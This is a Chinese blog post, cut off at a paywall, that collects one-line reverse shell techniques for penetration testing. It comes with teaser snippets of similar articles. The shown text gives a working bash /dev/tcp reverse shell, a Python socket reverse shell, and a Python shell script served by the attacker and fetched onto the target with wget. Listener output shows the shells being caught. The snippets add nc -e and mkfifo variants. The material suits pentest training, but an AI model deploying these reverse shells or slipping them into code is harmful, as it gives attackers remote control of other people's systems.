常用的一句话反弹shell总结

最新推荐文章于 2025-04-08 10:40:52 发布
最新推荐文章于 2025-04-08 10:40:52 发布
阅读量1.3w 收藏 61
点赞数 10
分类专栏: kali Linux 渗透测试 文章标签: 反弹shell 一句话反弹shell Kali Linux渗透测试 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_38684504/article/details/90047213
版权
本文总结了渗透测试中常用的一句话反弹shell方法,包括bash、python、php等多种方式,以及如何利用nc命令、Kali内置脚本和msfvenom生成反弹shell。详细阐述了每种方式的操作步骤,帮助安全研究人员快速获取目标系统的控制权。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

常用的一句话反弹shell总结

1. bash直接反弹

2. python一句话反弹shell

3. python脚本反弹shell

4. php一句话反弹shell

5. php脚本反弹shell

6. 使用nc命令获取靶机的反弹shell;

7. 使用Kali自带的脚本文件获取反弹shell

8. 使用msfvenom 获取一句话反弹shell

常用的一句话反弹shell总结

1. bash直接反弹

1.1> 在监听机上开启监听

nc -nvlp 8080

1.2> 在目标主机上写入bash反弹一句话

bash -i >& /dev/tcp/192.168.37.131/8080 0>&1
  • bash -i:产生一个bash的交互环境;
  • >&:将联合符号前面的内容与后面的内容相结合然后一起重定向给后者;
  • /dev/tcp/192.168.37.131/8080:与目标主机192.168.37.131/8080端口建立一个TCP连接;
  • 0>&1:将标准输入与标准输出相结合,重定向到前面标准输出内容;

1.3> 查看监听机上是否监听到shell;

root@root:~# nc -nvlp 8080
listening on [any] 8080 ...
connect to [192.168.37.131] from (UNKNOWN) [192.168.37.143] 46567
[tom@redhat home]$ whoami
whoami
tom
[tom@redhat home]$ pwd
pwd
/home
[tom@redhat home]$

2. python一句话反弹shell

2.1> 直接在Kali上监听1234端口,在靶机上执行如下命令:

root@root:/var/www/html# nc -nvlp 1234
listening on [any] 1234 ...
[tom@redhat tmp]$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.37.131",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

2.2> 在Kali上查看监听到的1234端口,获取反弹shell;

root@root:/var/www/html# nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.37.131] from (UNKNOWN) [192.168.37.143] 35065
sh-4.1$ whoami
whoami
tom
sh-4.1$

3. python脚本反弹shell

3.1> 在Kali的web访问目录下准备shell.py;并执行python -m SimpleHTTPServer 80,搭建简易Web服务(注:web服务在/var/www/html目录下开启,当然也可以直接开启阿帕奇服务 /etc/init.d/apache2 start);

root@root:~# cd /var/www/html/
root@root:/var/www/html# vim shell.py
root@root:/var/www/html# cat shell.py   #shell.py的内容
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.37.131",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])
root@root:/var/www/html# /etc/init.d/apache2 start     #开启Apache服务
[ ok ] Starting apache2 (via systemctl): apache2.service.

3.2> 将python shell脚本下载到目标靶机系统;(一般下载到/tmp目录下)

[tom@redhat tmp]$ wget http://192.168.37.131/shell.py
--2019-05-20 13:54:58--  http://192.168.37.131/shell.py
正在连接 192.168.37.131:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:218 [text/x-python]
正在保存至: “shell.py.1”

100%[======================================>] 218         --.-K/s   in 0s      

2019-05-20 13:54:58 (13.6 MB/s) - 已保存 “shell.py.1” [218/218])

3.3> 下载成功后,在Kali上开启监听端口1234;并在靶机上运行python脚本 ;

在Kali上开启监听端口1234:

root@root:/var/www/html# nc -nvlp 1234
listening on [any] 1234 ...

 在靶机上执行下载的python

最低0.47元/天 解锁文章
内网渗透-常用反弹shell方法总结
lza20001103的博客
08-28 4951
常用反弹shell方法总结 文章目录常用反弹shell方法总结前言bash反弹shellnc反弹shell1.nc弹linuxshell: nc -e /bin/bash 1.1.1.1 99992. 如果linux中nc没有-e参数3.nc 弹windows下的shell:whois 反弹shell常见脚本反弹1.python2.phppowercat反弹shellmsf反弹shell 前言 bash反弹shell bash -i >&/dev/tcp/1.1.1.1/9999 0&gt
Linux反弹Shell总结
qq_45600801的博客
01-06 4429
反弹姿势 1、NC正向反弹 靶机: nc -lvvp 靶机端口 -e /bin/sh 攻击机: nc 靶机ip 靶机端口 2、NC反向反弹 (1)、可使用-e参数: 靶机: nc x.x.x.x 8888 -e /bin/bash 攻击机: nc -lvvp 8888 (2)、NC,无-e参数反弹shell 有些版本的NC可能不支持-e选项,不能使用-e,则: 方法: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc
反弹shell--bash一句话解析
小刚的博客
01-10 3439
作者:小刚 位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 反弹shell解析bash反弹shell解析拆分语句了解下交互式连接设备文件描述符合并输入输出大合并 bash反弹shell解析 最基础的反弹shell语句,这么久只会用,但不知道其中的奇妙之处 真是妙蛙种子被踢出了米奇妙妙屋。。。 bash -i >& /dev/tcp/192.168.1.1/8888 0>&1 拆分语句了解下 交互式 bash -i是打开个.
一句话反弹shell
Jim的博客
08-21 4604
1.Bash: •bash–i >&/dev/tcp/10.0.0.1/80800>&1  //bash –i打开个交互的bash, /dev/tcp建立个socket连接, >&将标准错误输出重定向到标准输出中,0>&1将标准输入重定向到标准输出中。 •Linuxshell文件描述符: •1.标准输入:代码为0,使用 •2.标准输出:代码为1,使用>或>>; •3.标准错误输出:
渗透测试反弹shell的27种实战方法全解析,从零基础到精通,收藏这篇就够了!
最新发布
Libra1313的博客
04-08 1096
反弹 shell 技术作为渗透测试领域的关键技能,犹如把双刃剑,在专业人员手中,它是评估系统安全性、挖掘潜在漏洞的得力工具,能够帮助企业提前发现并修补安全防线的薄弱环节,有效抵御恶意攻击。但倘若落入不法之徒手中,便可能沦为窃取机密信息、破坏系统稳定、实施网络犯罪的凶器,给个人、企业乃至国家带来不可估量的损失。因此,对于广大网络安全从业者而言,深入理解并熟练掌握反弹 shell 技术不仅是提升个人专业素养的必经之路,更是维护网络空间安全稳定的职责所在。
Linuxtone命令一句话(定期更新)
weixin_34242658的博客
06-25 267
来源:[url]http://bbs.linuxtone.org/thread-16-1-1.html[/url]作者:NetSeek 1.删除0字节文件 find -type f -size 0 -exec rm -rf {} \; 2.查看进程 按内存从大到小排列 ps -e-o "%C: %p : %z : %a"|sort -k5 -nr ...
「渗透」:一句话木马反弹shell的思路
binaxin的博客
10-06 2358
前提:现在情况是已经上传了一句话木马,可以执行命令如:ls,pwd,whoami等;问题在于,不管用python、bash还是perl都反弹不了,偷不了懒,就上msf把。 http://target-ip/where/muma/path/are/1587808279743_shell.jsp?pwd=admin&cmd=pwd /u01/oracle/user_projects/domains/base_domain http://target-ip/where/muma/path/are/158.
反弹shell一句话
08-31
- *1* [常用一句话反弹shell总结](https://blog.youkuaiyun.com/qq_38684504/article/details/90047213)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
常用一句话反弹shell总结
weixin_45116657的博客
10-19 1501
哈哈哈
webshell一句话
08-26
php,jsp,asp等脚本的常用一句话拿webshell,然后用菜刀连接即可
linux各种一句话反弹shell总结
mingyqf的博客
01-18 1411
【技术分享】linux各种一句话反弹shell总结 阅读量 1355554 | 评论 2 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jT8KDx3o-1642484911491)(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhX
php一句话反弹bash shell
aixuan9365的博客
04-21 542
来源:https://www.leavesongs.com/PHP/backshell-via-php.html 用到了,记录下 $sock = fsockopen($ip, $port); $descriptorspec = array( 0 => $sock, 1 => $sock, 2 => ...
容器内反弹shell的51种姿势
帮助别人等于帮助自己 ——MXi4oyu
11-19 1615
什么是反弹shell反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了台机器,打开了该机器的个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向
反弹Shell,看这篇就够了
Appleteachers的博客
04-24 1413
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了台机器,打开了该机器的个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
各种语言一句话反弹shell
weixin_33947521的博客
12-30 191
转自:http://wiki.wooyun.org/pentest:%E5%90%84%E7%A7%8D%E8%AF%AD%E8%A8%80%E4%B8%80%E5%8F%A5%E8%AF%9D%E5%8F%8D%E5%BC%B9shellBash [不通用,跟linux发行版本有关,在ubuntu上测试成功]bash-i>&/dev/tcp/10.0.0...
php反弹,php一句话反弹bash shell
weixin_36361396的博客
03-10 232
OpenCV2+入门系列(四):计算图像的直方图,平均灰度,灰度方差本篇懒得排版,直接在网页html编辑器编辑 在图像处理时,我们常常需要求出图像的直方图.灰度平均值.灰度的方差,这里给出个opencv2+自带程序,实现这些功能. 直方图 对于直方图,使用cv::c ...ARM9的中断控制器简要复习下ARM9中断控制器的控制过程: 1.首先能识别触发的中断(对应中断源必须打...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值